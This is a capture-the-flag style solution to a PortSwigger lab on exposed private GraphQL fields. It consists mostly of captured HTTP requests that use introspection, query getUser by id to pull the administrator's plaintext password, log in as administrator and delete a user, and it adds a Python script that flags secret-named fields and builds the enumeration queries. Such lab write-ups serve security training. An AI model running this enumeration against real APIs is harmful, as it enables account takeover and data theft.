PortSwigger Web Security Academy lab: Accidental exposure of private GraphQL fields

Solution

Note: the requests below were captured from two separate lab instances (hosts 0a91008904b5d24e838eb58600a40019 and 0afc004903af986380d3e41800cd007b), so host names, session cookies and the recovered administrator password differ between steps.

Log in as the user wiener (username wiener, password peter). The login is a GraphQL mutation sent to /graphql/v1:

POST /graphql/v1 HTTP/2
Host: 0a91008904b5d24e838eb58600a40019.web-security-academy.net
Cookie: session=MeyLQ5tyy4B3n0H5cWFxBRuCXASYhsrx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net/login
Content-Type: application/json
Content-Length: 232
Origin: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"query":"\n    mutation login($input: LoginInput!) {\n        login(input: $input) {\n            token\n            success\n        }\n    }","operationName":"login","variables":{"input":{"username":"wiener","password":"peter"}}}

Send the request to Repeater.

In Repeater, right-click the request and choose GraphQL > Set introspection query. Burp replaces the body with a full __schema introspection query; the request below is the login request as it was sent to Repeater, still carrying the login mutation body.
---
POST /graphql/v1 HTTP/2
Host: 0afc004903af986380d3e41800cd007b.web-security-academy.net
Cookie: session=c3ipwujeH9rhWECk6l0qIhLpjt8QRbEK
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0afc004903af986380d3e41800cd007b.web-security-academy.net/login
Content-Type: application/json
Content-Length: 232
Origin: https://0afc004903af986380d3e41800cd007b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"query":"\n    mutation login($input: LoginInput!) {\n        login(input: $input) {\n            token\n            success\n        }\n    }","operationName":"login","variables":{"input":{"username":"wiener","password":"peter"}}}
---

Save GraphQL queries to site map

Right-click the introspection response and choose GraphQL > Save GraphQL queries to site map. Burp generates one request per query in the schema. Among them is a getUser(id) query whose selection set includes a password field, a field that should never be exposed to API clients:
{"query":"query($id: Int!) {\n  getUser(id: $id) {\n    id\n    username\n    password\n  }\n}","variables":{"id":0}}
---
POST /graphql/v1 HTTP/1.1
Host: 0afc004903af986380d3e41800cd007b.web-security-academy.net
Cookie: session=c3ipwujeH9rhWECk6l0qIhLpjt8QRbEK
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0afc004903af986380d3e41800cd007b.web-security-academy.net/login
Content-Type: application/json; charset=utf-8
Origin: https://0afc004903af986380d3e41800cd007b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Content-Length: 117

{"query":"query($id: Int!) {\n  getUser(id: $id) {\n    id\n    username\n    password\n  }\n}","variables":{"id":0}}
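As an added example (not part of the original write-up and not PortSwigger's or Burp's code), the Python script below does offline what the Burp steps above do interactively: it walks an introspection result, flags object types that carry fields named like secrets, lists the root queries that return those types, and rebuilds the getUser(id) JSON body Burp saved to the site map so the id can be varied. The introspection JSON inside it is constructed by hand to mirror the lab's getUser query; the BlogPost entries are made up for contrast and are not taken from the page.

```python
import json
import re

# Field names that should never be readable through a client-facing schema.
SENSITIVE = re.compile(r"password|passwd|secret|token|api[_-]?key", re.IGNORECASE)


def named(kind, name):
    """Introspection type reference for a named type (no wrapper)."""
    return {"kind": kind, "name": name, "ofType": None}


def non_null(inner):
    """Wrap a type reference in NON_NULL, as introspection does for 'Int!'."""
    return {"kind": "NON_NULL", "name": None, "ofType": inner}


# Constructed sample introspection result (assumption: trimmed to the shape the
# lab's getUser(id) query implies; a real __schema result also lists mutations,
# the __Type/__Schema meta types and many more fields).
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "getUser",
             "args": [{"name": "id", "type": non_null(named("SCALAR", "Int"))}],
             "type": named("OBJECT", "User")},
            {"name": "getBlogPost",  # made up for contrast, not from the lab
             "args": [{"name": "id", "type": non_null(named("SCALAR", "Int"))}],
             "type": named("OBJECT", "BlogPost")},
            {"name": "getAllBlogPosts", "args": [],  # made up for contrast
             "type": {"kind": "LIST", "name": None, "ofType": named("OBJECT", "BlogPost")}},
        ]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "id", "args": [], "type": non_null(named("SCALAR", "Int"))},
            {"name": "username", "args": [], "type": non_null(named("SCALAR", "String"))},
            {"name": "password", "args": [], "type": named("SCALAR", "String")},
        ]},
        {"kind": "OBJECT", "name": "BlogPost", "fields": [
            {"name": "id", "args": [], "type": non_null(named("SCALAR", "Int"))},
            {"name": "title", "args": [], "type": named("SCALAR", "String")},
        ]},
        {"kind": "SCALAR", "name": "Int", "fields": None},
        {"kind": "SCALAR", "name": "String", "fields": None},
    ],
}}}


def base_type_name(type_ref):
    """Strip NON_NULL / LIST wrappers and return the underlying type name."""
    while type_ref is not None and type_ref.get("name") is None:
        type_ref = type_ref.get("ofType")
    return None if type_ref is None else type_ref["name"]


def sensitive_fields(introspection):
    """Map each user-defined object type to its fields matching SENSITIVE."""
    found = {}
    for t in introspection["data"]["__schema"]["types"]:
        if t.get("kind") != "OBJECT" or t["name"].startswith("__"):
            continue
        hits = [f["name"] for f in (t.get("fields") or []) if SENSITIVE.search(f["name"])]
        if hits:
            found[t["name"]] = hits
    return found


def exposing_queries(introspection):
    """Root queries whose (unwrapped) return type carries a sensitive field,
    as (query name, argument names, return type, sensitive field names)."""
    schema = introspection["data"]["__schema"]
    leaks = sensitive_fields(introspection)
    root = next(t for t in schema["types"] if t["name"] == schema["queryType"]["name"])
    out = []
    for q in root["fields"]:
        ret = base_type_name(q["type"])
        if ret in leaks:
            out.append((q["name"], [a["name"] for a in q["args"]], ret, leaks[ret]))
    return out


def build_query(query_name, arg_name, arg_type, field_names, value):
    """JSON body in the layout Burp writes to the site map; with
    ("getUser", "id", "Int!", ["id", "username", "password"], 1) the query
    string and variables match the lab's request, ready to send with any
    valid session cookie."""
    selection = "\n".join(f"    {f}" for f in field_names)
    query = (f"query(${arg_name}: {arg_type}) {{\n"
             f"  {query_name}({arg_name}: ${arg_name}) {{\n{selection}\n  }}\n}}")
    return {"query": query, "variables": {arg_name: value}}


if __name__ == "__main__":
    for name, args, ret, fields in exposing_queries(SAMPLE_INTROSPECTION):
        print(f"{name}({', '.join(args)}) returns {ret}, which exposes {fields}")
    # Enumerate ids the way the write-up does by hand (0, then 1 for administrator).
    for user_id in (0, 1):
        print(json.dumps(build_query("getUser", "id", "Int!",
                                     ["id", "username", "password"], user_id)))
```

Against a real target you would feed the script the JSON returned by Burp's introspection request instead of SAMPLE_INTROSPECTION; the scan logic is the same. Note that the regex only catches obvious names, so a type carrying a secret under an innocuous field name still needs a manual read of the schema.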

Edit request

Send the getUser request to Repeater and change the id variable from 0 to 1. The query accepts any integer id and applies no authorization check, so it returns another user's record:
---
POST /graphql/v1 HTTP/2
Host: 0afc004903af986380d3e41800cd007b.web-security-academy.net
Cookie: session=c3ipwujeH9rhWECk6l0qIhLpjt8QRbEK
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0afc004903af986380d3e41800cd007b.web-security-academy.net/login
Content-Type: application/json; charset=utf-8
Origin: https://0afc004903af986380d3e41800cd007b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Content-Length: 117

{"query":"query($id: Int!) {\n  getUser(id: $id) {\n    id\n    username\n    password\n  }\n}","variables":{"id":1}}
---
The response returns the administrator's username and plaintext password:
{
  "data": {
    "getUser": {
      "id": 1,
      "username": "administrator",
      "password": "71g50dxpl364a23ro4j3"
    }
  }
}

Log in as administrator with the recovered password

POST /graphql/v1 HTTP/2
Host: 0a91008904b5d24e838eb58600a40019.web-security-academy.net
Cookie: session=fou7fKQsrZdKuJolmqfuGMb61jbY7bau; session=nM4SJ2LE162TjTMliTgmoUVovPyYUDdf
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net/login
Content-Type: application/json
Content-Length: 254
Origin: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"query":"\n    mutation login($input: LoginInput!) {\n        login(input: $input) {\n            token\n            success\n        }\n    }","operationName":"login","variables":{"input":{"username":"administrator","password":"99qfsqohrwt42nx18g0d"}}}
---
GET /my-account HTTP/2
Host: 0a91008904b5d24e838eb58600a40019.web-security-academy.net
Cookie: session=Pnu0XAxyVMybXHcE1AMN7t59Q9p1nW7M
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Delete the user carlos from the admin panel

GET /admin HTTP/2
Host: 0a91008904b5d24e838eb58600a40019.web-security-academy.net
Cookie: session=Pnu0XAxyVMybXHcE1AMN7t59Q9p1nW7M
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net/my-account
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /admin/delete?username=carlos HTTP/2
Host: 0a91008904b5d24e838eb58600a40019.web-security-academy.net
Cookie: session=Pnu0XAxyVMybXHcE1AMN7t59Q9p1nW7M
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Solved